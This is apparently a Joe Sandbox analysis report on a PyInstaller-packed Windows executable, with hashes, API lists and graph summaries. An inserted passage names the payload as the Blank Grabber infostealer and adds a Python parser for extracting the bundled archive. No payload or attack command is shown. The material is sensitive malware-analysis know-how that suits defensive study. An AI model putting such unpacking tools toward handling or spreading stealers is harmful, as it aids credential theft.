• API ID: CurrentDirectory
• String ID: :
• API String ID: 1611563598-336475711
• Opcode ID: 3c906c99ff6b46cc0de181ba7a1caf37579b2c2fe8814107475e6c290f9e88a5
• Instruction ID: 5caf77bb7a427f7bcc5ee072635b860c76652069f9402c3a4dde291d2f2b1d77
• Opcode Fuzzy Hash: 3c906c99ff6b46cc0de181ba7a1caf37579b2c2fe8814107475e6c290f9e88a5
• Instruction Fuzzy Hash: E121A562A0C681C2EB24AB55E04467DA3B1FB84B44FF54035DB8D43694EF7CDD49CB62
Memory Dump Source
• Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
• Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
Similarity
• API ID: ExceptionFileHeaderRaise
• String ID: csm
• API String ID: 2573137834-1018135373
• Opcode ID: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
• Instruction ID: c29bbc9e51ddcaffc4fb6b46f2ff59d26d71bc30c6d5363a6c18b44b13bb589c
• Opcode Fuzzy Hash: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
• Instruction Fuzzy Hash: 28111C3261DB8182EB619B15F440669B7E4FB88B88FA84230EECD47759EF3CD955CB01
Memory Dump Source
• Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
• Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID: :
                                                                                                                                                                                                                                        • API String ID: 2595371189-336475711
                                                                                                                                                                                                                                        • Opcode ID: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
                                                                                                                                                                                                                                        • Instruction ID: f42e1ba49de68c67b6419abf6421ce930fcc994f958dc09475f3b5992b0d5890
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EB01216291C64285F720BF60A465A7EA3B0FF44B48FF40435D58D86695FF2CE948CA26

Execution Graph

Execution Coverage: 8.2%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0.4%
Total number of Nodes: 462
Total number of Limit Nodes: 33

[Execution graph: shown in the interactive report as a node/edge diagram; the raw node and edge list is not reproduced here. The graph starts at 7ff78da5ccac, passes through CRT startup routines labelled __scrt_acquire_startup_lock, __scrt_release_startup_lock, __scrt_get_show_window_mode and __scrt_dllmain_crt_thread_attach, and enters the function at 7ff78da51000. Win32 APIs labelled on nodes reached from there: GetModuleFileNameW, FindFirstFileExW, FindClose, SetDllDirectoryW, LoadLibraryExW, CreateFileW, GetFileType, GetFileAttributesExW, ReadFile, ReadConsoleW, GetConsoleMode, SetFilePointerEx, CloseHandle, SetStdHandle, HeapAlloc, RtlFreeHeap, GetSystemInfo, GetLastError, SetLastError, GetCurrentProcessId, PostMessageW, GetMessageW, MessageBoxW and MessageBoxA. Many branches converge on one routine at 7ff78da52710, labelled MessageBoxW, MessageBoxA, GetCurrentProcessId. CRT internals named on nodes: _fread_nolock, _invalid_parameter_noinfo. The graph also contains nodes outside the main image (for example 7ff8a92e1884 and 7ff8a87ef490 GetSystemInfo) and call targets left unresolved as raw addresses (00007FF8BFAB19C0, 00007FF8C6125630).]

Control-flow Graph

Legend in the interactive report: Executed / Not Executed basic blocks (the colouring is not recoverable from the text export).

[Control-flow graph: shown as a diagram; the basic-block and edge list is not reproduced here. The graphed function starts at 7ff78da51000, the entry reached from the CRT startup in the execution graph above, and its blocks extend to 7ff78da5405b. Win32 APIs called directly from its blocks: SetDllDirectoryW, LoadLibraryExW, PostMessageW, GetMessageW. Internal callees include 7ff78da52710 (the MessageBoxW/MessageBoxA routine), 7ff78da51950, 7ff78da51c80, 7ff78da545b0, 7ff78da57f80, 7ff78da58a20, 7ff78da58b30, 7ff78da58b90, 7ff78da59400, 7ff78da64fa0, 7ff78da652c0, 7ff78da53360 and 7ff78da536b0. The blocks at 7ff78da53c8f and 7ff78da53c97 (call 7ff78da5c5c0) are the common sink that the function's branches return to.]
Strings
Memory Dump Source
• Source File: 00000002.00000002.2405628550.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
• Associated: 00000002.00000002.2405593695.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2405669268.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2405704192.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2405704192.00007FF78DA91000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2405770842.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff78da50000_9g9LZNE4bH.jbxd
Similarity
• API ID: ErrorFileLastModuleName
• String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
• API String ID: 2776309574-3273434969
• Opcode ID: c4287787c746abb56e9331fa3c8956d7c4ae80ab217cba986f551fa52fb8bac5
• Instruction ID: 1a132817db7def829fbb78c57e271a0e3ee696cf273a2a4c8b821708b2050aec
• Opcode Fuzzy Hash: c4287787c746abb56e9331fa3c8956d7c4ae80ab217cba986f551fa52fb8bac5
• Instruction Fuzzy Hash: C2329F25A0C68291EA15BBA19454ABDE3B1BF85740FF44431DA5D832D2FF2CED5CC322

Control-flow Graph
APIs
Memory Dump Source
• Source File: 00000002.00000002.2405628550.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
• Associated: 00000002.00000002.2405593695.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2405669268.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2405704192.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2405704192.00007FF78DA91000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2405770842.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff78da50000_9g9LZNE4bH.jbxd
Similarity
• API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
• String ID:
• API String ID: 1617910340-0
• Opcode ID: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
• Instruction ID: 86c50e141fdaaecc99c5f8c7d154407f4b13856111a501c7bea3cad232770921
• Opcode Fuzzy Hash: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
• Instruction Fuzzy Hash: F9C10032B28A4185EB50EFA4D480AAC7765FB49B98FA40235DE6E577D4EF38D819C310
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2407338183.00007FF8A87E1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87E0000, based on PE: true
• Associated: 00000002.00000002.2407299776.00007FF8A87E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000002.00000002.2407338183.00007FF8A8932000.00000040.00000001.01000000.0000000B.sdmp
• Associated: 00000002.00000002.2407338183.00007FF8A8934000.00000040.00000001.01000000.0000000B.sdmp
• Associated: 00000002.00000002.2407338183.00007FF8A8949000.00000040.00000001.01000000.0000000B.sdmp
• Associated: 00000002.00000002.2407603885.00007FF8A894B000.00000080.00000001.01000000.0000000B.sdmp
• Associated: 00000002.00000002.2407635609.00007FF8A894C000.00000004.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8a87e0000_9g9LZNE4bH.jbxd
Similarity
• API ID: 00007
• String ID: database schema is locked: %s$out of memory$statement too long
• API String ID: 3568877910-1046679716
• Opcode ID: 3b5cb617efb2b80c3c8dfa67a96b6c2f85bc2abe2ff2955210009790a5627e4f
• Instruction ID: 6cf8b64ca72e028d89caffc0aa9be4a018f7bcd8ca3e4f41fa2eba5b381df87d
• Opcode Fuzzy Hash: 3b5cb617efb2b80c3c8dfa67a96b6c2f85bc2abe2ff2955210009790a5627e4f
• Instruction Fuzzy Hash: 7CF18122B0A682A6FB29DB21D4043BE67A1FF45BC4F085175DA4D47795DF7CE481C324
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2407338183.00007FF8A87E1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87E0000, based on PE: true
• Associated: 00000002.00000002.2407299776.00007FF8A87E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000002.00000002.2407338183.00007FF8A8932000.00000040.00000001.01000000.0000000B.sdmp
• Associated: 00000002.00000002.2407338183.00007FF8A8934000.00000040.00000001.01000000.0000000B.sdmp
• Associated: 00000002.00000002.2407338183.00007FF8A8949000.00000040.00000001.01000000.0000000B.sdmp
• Associated: 00000002.00000002.2407603885.00007FF8A894B000.00000080.00000001.01000000.0000000B.sdmp
• Associated: 00000002.00000002.2407635609.00007FF8A894C000.00000004.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff8a87e0000_9g9LZNE4bH.jbxd
Similarity
• API ID: 00007C6125630
• String ID: :memory:
• API String ID: 1529501491-2920599690
• Opcode ID: 223c0e835e9280b863b94f86a1bb581c8596e66e5017fd81c2f0212ddf9a21fd
• Instruction ID: 5f7e64c4e8fe407ba3509b78d5d4dd8a13e0befd6d51cfe6829c69f35903aa7b
• Opcode Fuzzy Hash: 223c0e835e9280b863b94f86a1bb581c8596e66e5017fd81c2f0212ddf9a21fd
• Instruction Fuzzy Hash: BE42B122E0E786A2EB658F26945433927A0FF95BC5F094139DE4E53791DF7CE890C328
APIs
Memory Dump Source
• Source File: 00000002.00000002.2405628550.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
• Associated: 00000002.00000002.2405593695.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2405669268.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2405704192.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2405704192.00007FF78DA91000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2405770842.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff78da50000_9g9LZNE4bH.jbxd
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
• Opcode ID: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
• Instruction ID: 7acfea21dac7172148ce9ffb628e02fbf80a6bfeb7f581dcf08e414705153f4c
• Opcode Fuzzy Hash: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
• Instruction Fuzzy Hash: F9F0496261C641C6F7609F90B44DB76A360BB44778F740235D9AD456D4EF3CD44DCA11
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2407338183.00007FF8A87E1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87E0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407299776.00007FF8A87E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407338183.00007FF8A8932000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407338183.00007FF8A8934000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407338183.00007FF8A8949000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407603885.00007FF8A894B000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2407635609.00007FF8A894C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff8a87e0000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InfoSystem
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 31276548-0
                                                                                                                                                                                                                                        • Opcode ID: 1d4a23596340e2b851e9cbd1cd717de596e1e73bc4475c85f957dec04d105ea9
                                                                                                                                                                                                                                        • Instruction ID: 6015aac9747b9a561202ad81fa8d623abbe7ea703f7f3c75d5a4f1ef5f22383b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1d4a23596340e2b851e9cbd1cd717de596e1e73bc4475c85f957dec04d105ea9
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DAA13E24E4BB07A2FE55CF65A45833422A0FF65BC6F580579C80D57BA0EF7CE4519328

Control-flow Graph

(Graph rendering omitted; only the edge list survived extraction. Function at 00007FF78DA51950, basic blocks 7ff78da51950 through 7ff78da51c72, with calls to 7ff78da545b0, 7ff78da57f80, 7ff78da60744, 7ff78da64f78, 7ff78da52910, 7ff78da6040c, 7ff78da64f98, 7ff78da51c80, 7ff78da64fb4, 7ff78da60180, 7ff78da52710, 7ff78da600bc and 7ff78da5c5c0. Legend: Executed / Not Executed.)
APIs
  • Part of subcall function 00007FF78DA57F80: _fread_nolock.LIBCMT ref: 00007FF78DA5802A
• _fread_nolock.LIBCMT ref: 00007FF78DA51A1B
  • Part of subcall function 00007FF78DA52910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF78DA51B6A), ref: 00007FF78DA5295E
Strings
Memory Dump Source
• Source File: 00000002.00000002.2405628550.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
• Associated: 00000002.00000002.2405593695.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2405669268.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2405704192.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2405704192.00007FF78DA91000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2405770842.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff78da50000_9g9LZNE4bH.jbxd
Similarity
• API ID: _fread_nolock$CurrentProcess
• String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
• API String ID: 2397952137-3497178890
• Opcode ID: 53af67305d532fbc314f4c998b34aeb01e511dd16d42ec936fdd9680fdd2256a
• Instruction ID: f150497cc9db9e2cc3b7950791f2096e1d46cd7d836e82e32eafdcd02b72e33c
• Opcode Fuzzy Hash: 53af67305d532fbc314f4c998b34aeb01e511dd16d42ec936fdd9680fdd2256a
• Instruction Fuzzy Hash: D5816371A0D68686EB60FB64E040AB9B3A0FF44744FB44431D98D87785FE3DE949C762

Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000002.00000002.2405628550.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
• Associated: 00000002.00000002.2405593695.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2405669268.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2405704192.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2405704192.00007FF78DA91000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2405770842.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff78da50000_9g9LZNE4bH.jbxd
Similarity
• API ID: CurrentProcess
• String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
• API String ID: 2050909247-3659356012
• Opcode ID: 9de0508d624f5450d0515946ea3b47b1e27dbb23ab3c408e47dc67f8f8a2cece
• Instruction ID: 8cbe3c5390da168785e7f66b97b79bb2c6dbf31273a18dd801e5468cb0ed9784
• Opcode Fuzzy Hash: 9de0508d624f5450d0515946ea3b47b1e27dbb23ab3c408e47dc67f8f8a2cece
• Instruction Fuzzy Hash: C3417161A0C64285EA10EBA1E4409B9F3A0BF44B94FF44832ED5E47795FF7CE949C722

Control-flow Graph

(Graph rendering omitted; only the edge list survived extraction. Function at 00007FF78DA51210, basic blocks 7ff78da51210 through 7ff78da5146d, with calls to 7ff78da5bdf0, 7ff78da64fb4, 7ff78da52710, 7ff78da64f78, 7ff78da52910, 7ff78da5bad0, 7ff78da64fa0, 7ff78da6040c, 7ff78da60180, 7ff78da5a230, 7ff78da60b4c and 7ff78da79ea0. Legend: Executed / Not Executed.)
Strings
Memory Dump Source
• Source File: 00000002.00000002.2405628550.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
• Associated: 00000002.00000002.2405593695.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2405669268.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2405704192.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2405704192.00007FF78DA91000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2405770842.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff78da50000_9g9LZNE4bH.jbxd
Similarity
• API ID: CurrentProcess
• String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
• API String ID: 2050909247-2813020118
• Opcode ID: c071fae04400aaba9d8a24e5b62ce610f1ca997db65dc53a1f24edd26e5d05d7
• Instruction ID: 83bdeffa9b284bc39f9b9522989849a960c31d204fa483dd02379651e05699df
• Opcode Fuzzy Hash: c071fae04400aaba9d8a24e5b62ce610f1ca997db65dc53a1f24edd26e5d05d7
• Instruction Fuzzy Hash: D451C362A0D64281E660BB91A450BBAA2A0FF45B94FF44131ED4D877C5FF3CED49C312
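The three function blocks above (the TOC reader at 00007FF78DA51950 with the "MEI" / "Failed to read cookie!" / "Could not read full TOC!" strings, the raw extractor with "failed to read data chunk!", and the inflate path with "inflateInit() failed" and the zlib version "1.3.1") are the PyInstaller bootloader reading the CArchive appended to its own executable; the Python payload the report goes on to classify as Blank Grabber lives inside that container. The following is an added example, not code from the Joe Sandbox report, from the sample or from the PyInstaller project: a parser for that container that performs the same three steps (find the cookie, walk the table of contents, read and inflate each entry). The layout (88-byte cookie `!8sIIii64s`, 18-byte TOC entry header `!iIIIBB` followed by a NUL-padded name, offsets relative to the archive start) is taken from the bootloader's `pyi_archive.h`. `build_archive` and the contents fed to `demo()` are constructed here for illustration and are not material from the analysed sample.

```python
"""Parse a PyInstaller one-file overlay (CArchive "PKG") the way the
bootloader does: locate the MEI cookie, read the TOC, inflate entries.
Format assumptions follow PyInstaller's bootloader (pyi_archive.h)."""
import struct
import zlib
from dataclasses import dataclass

COOKIE_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"
COOKIE_FMT = "!8sIIii64s"                 # magic, pkg_len, toc_off, toc_len, pyvers, pylib
COOKIE_LEN = struct.calcsize(COOKIE_FMT)  # 88 bytes
TOC_FMT = "!iIIIBB"                       # entry_len, pos, len, ulen, cflag, typcd
TOC_LEN = struct.calcsize(TOC_FMT)        # 18 bytes, name follows


@dataclass
class TocEntry:
    name: str
    pos: int           # relative to archive start
    length: int        # stored (possibly compressed) size
    ulength: int       # uncompressed size
    compressed: bool
    typecode: str      # 'b' binary, 'z' PYZ, 'm' module, 's' script, 'x' data, 'o' option


def find_cookie(blob: bytes) -> int:
    """Offset of the last MEI cookie, or -1. The bootloader searches backwards
    from EOF because the archive is appended after the PE image."""
    return blob.rfind(COOKIE_MAGIC)


def parse_archive(blob: bytes):
    """Return (archive_start, python_version, pylib_name, [TocEntry])."""
    cookie_pos = find_cookie(blob)
    if cookie_pos < 0 or cookie_pos + COOKIE_LEN > len(blob):
        raise ValueError("Failed to read cookie!")
    _magic, pkg_len, toc_off, toc_len, pyvers, pylib = struct.unpack(
        COOKIE_FMT, blob[cookie_pos:cookie_pos + COOKIE_LEN])
    # pkg_len covers everything up to and including the cookie itself.
    start = cookie_pos + COOKIE_LEN - pkg_len
    if start < 0 or start + toc_off + toc_len > len(blob):
        raise ValueError("Could not read full TOC!")
    toc = blob[start + toc_off:start + toc_off + toc_len]
    entries, cur = [], 0
    while cur + TOC_LEN <= len(toc):
        entry_len, pos, length, ulength, cflag, typcd = struct.unpack(
            TOC_FMT, toc[cur:cur + TOC_LEN])
        if entry_len < TOC_LEN or cur + entry_len > len(toc):
            raise ValueError("Error on file.")  # malformed TOC entry
        name = toc[cur + TOC_LEN:cur + entry_len].rstrip(b"\0").decode("utf-8")
        entries.append(TocEntry(name, pos, length, ulength, bool(cflag), chr(typcd)))
        cur += entry_len
    return start, pyvers, pylib.rstrip(b"\0").decode("utf-8"), entries


def extract(blob: bytes, start: int, e: TocEntry) -> bytes:
    """Seek to the entry's data, read it, and inflate it if flagged compressed."""
    data = blob[start + e.pos:start + e.pos + e.length]
    if len(data) != e.length:
        raise ValueError(f"Failed to extract {e.name}: failed to read data chunk!")
    if e.compressed:
        try:
            data = zlib.decompress(data)
        except zlib.error as exc:
            raise ValueError(f"Failed to extract {e.name}: decompression failed ({exc})")
        if len(data) != e.ulength:
            raise ValueError(f"Failed to extract {e.name}: size mismatch after inflate")
    return data


def build_archive(files, pyvers=311, pylib=b"python311.dll") -> bytes:
    """Writer side of the same format, used here only to construct test input."""
    body, toc = bytearray(), bytearray()
    for name, typcd, payload, compress in files:
        stored = zlib.compress(payload, 9) if compress else payload
        pos = len(body)
        body += stored
        name_b = name.encode("utf-8") + b"\0"
        entry_len = TOC_LEN + len(name_b)
        if entry_len % 16:               # real writer pads entries to 16 bytes
            entry_len += 16 - entry_len % 16
        toc += struct.pack(TOC_FMT, entry_len, pos, len(stored), len(payload),
                           int(compress), ord(typcd))
        toc += name_b.ljust(entry_len - TOC_LEN, b"\0")
    pkg_len = len(body) + len(toc) + COOKIE_LEN
    cookie = struct.pack(COOKIE_FMT, COOKIE_MAGIC, pkg_len, len(body), len(toc),
                         pyvers, pylib)
    return bytes(body + toc + cookie)


def demo():
    """Constructed input: a stub 'MZ' prefix standing in for the PE, then a
    two-entry archive. Returns {name: (typecode, compressed, payload)}."""
    sample = b"MZ" + b"\0" * 62 + build_archive([
        ("PYZ-00.pyz", "z", b"PYZ\0" + b"A" * 200, True),   # compressed bundle
        ("VERSION.txt", "x", b"1.0", False),               # stored raw data file
    ])
    start, _pyvers, _pylib, entries = parse_archive(sample)
    return {e.name: (e.typecode, e.compressed, extract(sample, start, e)) for e in entries}
```

On a real sample, pass the whole executable's bytes to `parse_archive`; the `rfind` mirrors the bootloader's backward search, which is why trailing data after the cookie (an appended signature, for instance) does not break it. Two caveats: cookies written by PyInstaller releases before the 88-byte layout lack the `pylibname` field and will not unpack with this format, and the entries this returns are still Python bytecode (the PYZ bundle and individual `.pyc` modules), so decompilation is a separate step.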

                                                                                                                                                                                                                                        Control-flow Graph

APIs
• GetModuleFileNameW.KERNEL32(?,00007FF78DA53804), ref: 00007FF78DA536E1
• GetLastError.KERNEL32(?,00007FF78DA53804), ref: 00007FF78DA536EB
  • Part of subcall function 00007FF78DA52C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF78DA53706,?,00007FF78DA53804), ref: 00007FF78DA52C9E
  • Part of subcall function 00007FF78DA52C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF78DA53706,?,00007FF78DA53804), ref: 00007FF78DA52D63
  • Part of subcall function 00007FF78DA52C50: MessageBoxW.USER32 ref: 00007FF78DA52D99
Strings
Memory Dump Source
• Source File: 00000002.00000002.2405628550.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
• Associated: 00000002.00000002.2405593695.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2405669268.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2405704192.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2405704192.00007FF78DA91000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2405770842.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff78da50000_9g9LZNE4bH.jbxd
Similarity
• API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
• String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
• API String ID: 3187769757-2863816727
• Opcode ID: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
• Instruction ID: 7717ac3ef6787c80bccf3a6e8d4662c83217e52139907c3021cf21ed31e9620a
• Opcode Fuzzy Hash: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
• Instruction Fuzzy Hash: 1F216051F1C64291FA20BB60E805BBAA260BF88354FF00132E59DC65D5FF2CE90DC722

Control-flow Graph

[Control-flow graph of the function at 7ff78da6bacc (interactive executed / not-executed rendering); node and edge listing not reproduced. Calls visible in the graph: ReadFile, GetConsoleMode, ReadConsoleW, GetLastError, _invalid_parameter_noinfo]
APIs
Memory Dump Source
• Source File: 00000002.00000002.2405628550.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
• Associated: 00000002.00000002.2405593695.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2405669268.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2405704192.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2405704192.00007FF78DA91000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.2405770842.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_7ff78da50000_9g9LZNE4bH.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 2e9ec559793cd78946ccf1fde0a110b7883fce20fe8558fd890645317879f727
